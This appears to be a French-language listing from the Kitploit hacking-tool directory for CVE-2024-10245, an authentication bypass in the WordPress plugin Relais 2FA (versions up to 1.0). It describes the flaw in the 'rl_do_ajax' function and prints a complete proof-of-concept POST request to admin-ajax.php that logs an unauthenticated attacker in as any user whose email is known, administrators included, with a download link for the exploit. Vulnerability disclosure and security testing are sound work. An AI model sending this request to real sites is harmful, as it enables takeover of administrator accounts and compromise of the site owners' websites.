Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-10245 — Relais 2FA <= 1.0 - Contournement de l'authentification | Kitploit
Outils/GitHubGitHub/randomrobbiebf/cve-2024-10245
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'IntrusionAuthentification
GitHubrandomrobbiebf/cve-2024-10245

CVE-2024-10245

Relais 2FA <= 1.0 - Contournement de l'authentification

Voir le dépôt
2il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-10245

Relais 2FA <= 1.0 - Contournement de l'authentification

Description

Le plugin Relais 2FA pour WordPress est vulnérable à un contournement de l'authentification dans les versions jusqu'à la 1.0 incluse. Cela est dû à une vérification incorrecte de l'authentification et des capacités dans la fonction 'rl_do_ajax'. Cela permet à des attaquants non authentifiés de se connecter en tant que n'importe quel utilisateur existant du site, comme un administrateur, s'ils ont accès à l'e-mail.

POC

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: kubernetes.docker.internal
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://kubernetes.docker.internal/wp-admin/admin.php?page=wp-time-capsule-settings
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 78
Origin: http://kubernetes.docker.internal
Connection: keep-alive

action=rl_do_ajax&rl_action=authenticate&nonce=213123123&[email protected]
Télécharger l’outil